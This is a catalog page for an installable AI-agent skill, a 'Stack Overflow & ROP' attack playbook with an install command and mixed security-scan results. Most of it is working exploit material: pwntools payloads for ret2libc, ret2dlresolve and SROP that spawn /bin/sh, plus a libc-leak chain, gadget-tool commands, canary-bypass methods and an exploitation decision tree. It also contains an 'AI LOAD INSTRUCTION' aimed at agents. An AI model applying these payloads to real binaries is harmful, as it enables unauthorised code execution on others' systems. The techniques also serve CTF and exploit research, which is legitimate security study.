stack-overflow-and-rop
Stack overflow and ROP playbook. Use when exploiting buffer overflows to hijack control flow via return address overwrite, ROP chains, ret2libc, ret2csu, ret2dlresolve, or SROP on Linux userland binaries.
How do I install this agent skill?
npx skills add https://github.com/yaklang/hack-skills --skill stack-overflow-and-ropIs this agent skill safe to install?
- Gen Agent Trust Hubpass
This skill is a detailed technical reference and playbook for stack overflow and Return-Oriented Programming (ROP) exploitation. It provides educational content, architectural diagrams, and command-line examples for using standard security research tools. No malicious behavior or security risks were detected in the skill's instructions or scripts.
- Socketwarn
1 alert: gptSecurity
- Snykfail
Risk: CRITICAL · 1 issue
- ZeroLeakspass
1 finding · Score: 86/100
What does this agent skill do?
SKILL: Stack Overflow & ROP — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert stack-based exploitation techniques. Covers classic buffer overflow, return-to-libc, ROP chain construction, ret2csu, ret2dlresolve, SROP, stack pivoting, and canary bypass. Distilled from ctf-wiki advanced-rop, real-world CVEs, and CTF competition patterns. Base models often miss the nuance of gadget selection under constrained conditions.
0. RELATED ROUTING
- format-string-exploitation — leak canary/libc/PIE base via format string before triggering overflow
- binary-protection-bypass — systematic bypass of NX, ASLR, PIE, canary, RELRO
- arbitrary-write-to-rce — convert a write primitive (GOT, hooks, vtable) into code execution
- heap-exploitation — when the vulnerability is in heap rather than stack
Advanced Reference
Load ROP_ADVANCED_TECHNIQUES.md when you need:
- Blind ROP (BROP) methodology against remote services without binary
- ret2vdso for ASLR bypass on 32-bit systems
- Partial overwrite techniques for PIE bypass
- JOP / COP alternative code-reuse paradigms
1. STACK LAYOUT FUNDAMENTALS
High Address
┌─────────────────────┐
│ ... (caller) │
├─────────────────────┤
│ Return Address │ ← overwrite target (EIP/RIP control)
├─────────────────────┤
│ Saved EBP/RBP │ ← overwrite for stack pivoting
├─────────────────────┤
│ Canary (if enabled)│
├─────────────────────┤
│ Local Variables │ ← buffer starts here
├─────────────────────┤
│ ... │
└─────────────────────┘
Low Address
| Element | x86 (32-bit) | x86-64 (64-bit) |
|---|---|---|
| Return address size | 4 bytes | 8 bytes |
| Saved frame pointer | 4 bytes (EBP) | 8 bytes (RBP) |
| Canary size | 4 bytes | 8 bytes |
| Calling convention | args on stack | RDI, RSI, RDX, RCX, R8, R9 then stack |
| Syscall instruction | int 0x80 | syscall |
2. RETURN-TO-LIBC
When NX is enabled (stack not executable), redirect execution to libc functions.
Classic ret2libc (32-bit)
payload = b'A' * offset
payload += p32(system_addr)
payload += p32(exit_addr) # fake return address for system()
payload += p32(binsh_addr) # arg1: "/bin/sh"
ret2libc (64-bit) — Need Gadgets for Arguments
pop_rdi = elf_base + 0x401234 # pop rdi; ret
payload = b'A' * offset
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
Libc Base Leak Methods
| Method | Technique | When |
|---|---|---|
| puts@plt(puts@GOT) | Leak resolved libc address | GOT already resolved, puts in PLT |
| write@plt(1, read@GOT, 8) | Leak via write syscall | write available |
| printf("%s", GOT_entry) | Leak via format string | printf controllable |
| Partial overwrite | Overwrite low bytes of return to reach leak gadget | PIE enabled, known last 12 bits |
# Typical leak pattern
rop = b'A' * offset
rop += p64(pop_rdi) + p64(elf.got['puts'])
rop += p64(elf.plt['puts'])
rop += p64(main_addr) # return to main for second payload
io.sendline(rop)
leak = u64(io.recvline().strip().ljust(8, b'\x00'))
libc_base = leak - libc.symbols['puts']
one_gadget — Single Gadget RCE
$ one_gadget /path/to/libc.so.6
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints: rsp & 0xf == 0, rcx == NULL
0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints: [rsp+0x40] == NULL
Constraints must be satisfied — check register/stack state before using.
3. ROP CHAIN CONSTRUCTION
Tool Comparison
| Tool | Strength | Command |
|---|---|---|
| ROPgadget | Comprehensive search, chain generation | ROPgadget --binary elf --ropchain |
| ropper | Semantic search, JOP/COP support | ropper -f elf --search "pop rdi" |
| pwntools ROP | Automated chain building | rop = ROP(elf); rop.call('system', ['/bin/sh']) |
| xrop | Fast gadget search | xrop -r elf |
Essential Gadget Patterns
| Purpose | Gadget | Use Case |
|---|---|---|
| Set RDI (arg1) | pop rdi; ret | Most function calls |
| Set RSI (arg2) | pop rsi; pop r15; ret | Two-arg functions |
| Set RDX (arg3) | pop rdx; ret (rare) | Three-arg functions, use ret2csu |
| Syscall | syscall; ret | Direct syscall invocation |
| Stack pivot | leave; ret | Move RSP to controlled buffer |
| Align stack | ret (single ret gadget) | Fix 16-byte alignment for movaps |
x86-64 stack alignment: system() and other libc functions use movaps which requires RSP % 16 == 0. Insert an extra ret gadget before the call if alignment is off.
4. ret2csu — Universal 3-Argument Control
__libc_csu_init exists in nearly all dynamically linked ELF binaries and provides controlled calls with up to 3 arguments.
; Gadget 1 (csu_init + 0x3a): pop registers
pop rbx ; 0
pop rbp ; 1
pop r12 ; call target (function pointer address)
pop r13 ; arg3 (rdx)
pop r14 ; arg2 (rsi)
pop r15 ; arg1 (edi = r15d)
ret
; Gadget 2 (csu_init + 0x20): controlled call
mov rdx, r13
mov rsi, r14
mov edi, r15d ; NOTE: only sets edi (32-bit), not full rdi
call [r12 + rbx*8]
add rbx, 1
cmp rbp, rbx
jne <loop>
; falls through to gadget 1 again
Key constraints: r12 must point to a pointer to the target function (e.g., GOT entry), not the function address directly. Set rbx=0, rbp=1 to skip the loop.
5. ret2dlresolve
Forge ELF dynamic linking structures to resolve an arbitrary function (e.g., system) without a libc leak.
Attack Flow
- Control execution to call
_dl_runtime_resolve(link_map, reloc_offset) - Forge
Elf_Relat known writable address pointing to fakeElf_Sym - Forge
Elf_Symwithst_namepointing to fake string"system\x00" - Set
reloc_offsetso resolver uses forged structures - Argument (
/bin/sh) placed on stack or in known buffer
# pwntools automation (recommended)
from pwntools import *
rop = ROP(elf)
dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["/bin/sh"])
rop.read(0, dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)
io.sendline(rop.chain())
io.sendline(dlresolve.payload)
32-bit vs 64-bit Differences
| Aspect | 32-bit | 64-bit |
|---|---|---|
| Relocation type | Elf32_Rel (8 bytes) | Elf64_Rela (24 bytes) |
| Symbol table entry | Elf32_Sym (16 bytes) | Elf64_Sym (24 bytes) |
| Alignment | Relaxed | Strict (must satisfy ndx = (reloc_offset) / sizeof(Elf64_Rela), then sym = symtab[ndx]) |
| Version check | Usually skippable | VERSYM[sym_index] must be valid or 0 |
6. SROP — Sigreturn-Oriented Programming
Abuse the sigreturn syscall to set all registers at once from a fake Signal Frame on the stack.
from pwn import *
frame = SigreturnFrame()
frame.rax = constants.SYS_execve # 59
frame.rdi = binsh_addr
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_ret_addr
frame.rsp = new_stack_addr # optional pivot
payload = b'A' * offset
payload += p64(pop_rax_ret) + p64(15) # SYS_rt_sigreturn = 15
payload += p64(syscall_ret)
payload += bytes(frame)
When to use: limited gadgets, no pop rdx, static binary, or need to pivot stack to arbitrary address.
7. STACK PIVOTING
Move the stack pointer to an attacker-controlled buffer when overflow length is limited.
| Technique | Gadget | Precondition |
|---|---|---|
leave; ret | mov rsp, rbp; pop rbp; ret | Control saved RBP to point to fake stack |
xchg rsp, rax; ret | Swap RSP with RAX | Control RAX (via gadget chain) |
pop rsp; ret | Direct RSP control | Rare but powerful |
| SROP pivot | Set RSP in SigreturnFrame | Only need sigreturn gadget |
leave;ret Pivot Pattern
Overflow: [AAAA...][fake_rbp → buf][leave_ret_addr]
1st leave: rsp = rbp → fake_rbp; pop rbp → *fake_rbp
1st ret: rip = leave_ret_addr
2nd leave: rsp = new_rbp → buf+8; pop rbp → *(buf)
2nd ret: rip = *(buf+8) → start of ROP chain in buf
8. CANARY BYPASS
| Technique | Condition | Method |
|---|---|---|
| Brute-force | fork() server (canary same in child) | Byte-by-byte (256 × 7 = 1792 attempts for 64-bit) |
| Format string leak | printf(user_input) available | %N$p to read canary from stack |
| Stack reading | One-byte overflow or partial read | Overwrite canary null byte, read via error/output |
| Thread canary | Overflow reaches TLS | Overwrite stack_guard in TLS (at fs:[0x28]) simultaneously |
| Information disclosure | Uninitialized stack variable leak | Canary included in leaked data |
9. TOOLS QUICK REFERENCE
checksec ./binary # Show protections (NX, canary, PIE, RELRO)
ROPgadget --binary ./binary --ropchain # Auto-generate ROP chain
ropper -f ./binary --search "pop rdi" # Semantic gadget search
one_gadget ./libc.so.6 # Find one-shot RCE gadgets
pwn template ./binary --host x --port y # Generate pwntools exploit skeleton
10. DECISION TREE
Binary has stack overflow?
├── checksec: NX disabled?
│ └── YES → shellcode on stack, ret to buffer (ret2shellcode)
│ └── NO (NX enabled) →
│ ├── Canary enabled?
│ │ ├── YES → fork() server? → brute-force canary
│ │ │ format string? → leak canary
│ │ │ info leak? → read canary
│ │ └── NO → proceed to ROP
│ ├── ASLR/PIE enabled?
│ │ ├── PIE → leak code base (partial overwrite last 12 bits, or info leak)
│ │ ├── ASLR only → leak libc base (puts@GOT, write@GOT)
│ │ └── Neither → addresses known, direct ROP
│ ├── Can leak libc?
│ │ ├── YES → ret2libc (system/execve) or one_gadget
│ │ └── NO → ret2dlresolve (forge resolution) or SROP
│ ├── Need 3+ args but no pop rdx?
│ │ └── ret2csu or SROP
│ ├── Overflow too short for full chain?
│ │ └── Stack pivot (leave;ret, xchg rsp)
│ ├── Static binary (no libc)?
│ │ └── SROP + syscall chain (execve via sigreturn)
│ └── Full RELRO?
│ └── Cannot overwrite GOT → target __free_hook, __malloc_hook,
│ or _IO_FILE vtable (see ../arbitrary-write-to-rce/)
How can the creator link this skill?
Add the canonical catalog link to the repository README so users can inspect current installs and available audits. The publishing guide covers the complete discovery path.
<a href="https://skillzs.dev/skills/yaklang/hack-skills/stack-overflow-and-rop">View stack-overflow-and-rop on skillZs</a>